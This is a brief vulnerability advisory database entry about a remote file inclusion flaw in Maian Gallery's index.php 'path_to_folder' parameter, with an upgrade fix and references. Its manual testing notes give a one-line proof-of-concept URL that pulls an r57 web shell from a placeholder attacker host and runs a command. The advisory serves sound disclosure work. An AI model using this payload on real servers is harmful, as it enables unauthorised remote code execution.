Maian Gallery index.php path_to_folder Variable Remote File Inclusion

2007-04-14T15:59:52
ID OSVDB:34149
Type osvdb
Reporter KaRTaL(k4rtal@gmail.com)
Modified 2007-04-14T15:59:52

Description

Vulnerability Description

Maian Gallery contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to index.php not properly sanitizing user input supplied to the 'path_to_folder' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version v1.0 (after 2006) or higher, as it has been reported to fix this vulnerability. Note that this flaw was fixed at an unspecified date in year 2006 without a change in version number. An upgrade is required as there are no known workarounds.

Short Description

Maian Gallery contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to index.php not properly sanitizing user input supplied to the 'path_to_folder' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

/index.php?path_to_folder=http://[attacker]/r57.txt?cmd=id

References:

Vendor Specific Advisory URL Mail List Post: http://attrition.org/pipermail/vim/2007-April/001530.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0222.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0233.html ISS X-Force ID: 33692 CVE-2007-2076